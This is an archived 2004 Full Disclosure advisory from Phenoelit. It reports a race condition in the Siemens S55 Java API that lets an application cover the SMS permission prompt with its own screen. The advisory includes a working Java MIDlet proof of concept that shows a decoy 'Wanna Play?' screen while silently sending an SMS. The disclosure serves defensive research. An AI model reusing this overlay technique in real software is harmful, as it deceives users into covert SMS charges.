Full Disclosure mailing list archives
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
From: ftr <ftr () phenoelit de>
Date: Tue, 27 Apr 2004 17:47:07 +0200
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++> [ Authors ] FtR <ftr () phenoelit de> FX <fx () phenoelit de> Phenoelit Group (http://www.phenoelit.de) [ Affected Products ] Siemens S55 Possibly others Siemens : Not assigned [ Vendor communication ] 09/Nov/03 Initial Notification, support () siemens de *Note-Initial notification by phenoelit includes a cc to cert () cert org by default [ Overview ] The Siemens S55 is a cellphone and provides a Java virtual machine including a full featured API for additional software development by third parties. [ Description ] The Java API provides the possibilty to send out SMS messages through the Java Applications. This interface will ask for permissions to send out the SMS by presenting a message screen. The API also provides objects which alow a programmer to create personal screen layouts for his applications The vulnerability found can be described as a race condition which allows the programmer to overlay the message which asks for permission by his own screen craft. The result of that vulnerability will allow any program to send SMS to any number without notification to the user [ Example ] package hello; import javax.microedition.lcdui.*; import javax.microedition.midlet.*; import com.siemens.mp.game.Sound; import com.siemens.mp.gsm.*; import java.lang.*; import java.io.*; public class hello extends MIDlet implements CommandListener { static final String EXIT_COMMAND_LABEL = "Exit FtRs world"; Display display; static hello hello; public void startApp (){ HelloCanva kanvas = new HelloCanva(); Scr2 scr2 = new Scr2(); display = Display.getDisplay(this); // Menu Command exitCommand = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0); scr2.addCommand(exitCommand); scr2.setCommandListener(this); //Data // screen 1 display.setCurrent(kanvas); mycall(); // screen 2 display.setCurrent(scr2); //destroyApp(false); } public void mycall(){ String SMSstr= "Test"; try { /* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/ SMS.send("0170-Numder", SMSstr); } /* Exception handling */ catch (com.siemens.mp.NotAllowedException ex) { // Some handling code ... } catch (IOException ex) { //Some handling code ... } catch (IllegalArgumentException ex) { // Some handling code ... } } //public viod call() protected void destroyApp (boolean b){ display.setCurrent(null); this.notifyDestroyed(); // notify KVM } protected void pauseApp () { } public void commandAction (Command c, Displayable d){ destroyApp(false); } } class HelloCanva extends Canvas { public void paint (Graphics g) { String str = new String("Wanna Play?"); g.setColor(0,0,0); g.fillRect(0, 0, getWidth(), getHeight()); g.setColor(255,0,0); g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE); g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE); g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE); } } class Scr2 extends Canvas { public void paint (Graphics g) { String str = new String("cool"); g.setColor(0,0,0); g.fillRect(0, 0, getWidth(), getHeight()); g.setColor(255,0,0); g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE); } } [ Solution ] None known at this time. [ end of file ] -- #!/usr/local/bin/perl print&f(($_=(3x3)."3+33")=~s=3(?![^3]|$)=&f=eg); sub f{eval(@_?$_:"'$&+'x3");} _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++> ftr (Apr 27)
- Re: Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++> Michael Guenther (Apr 29)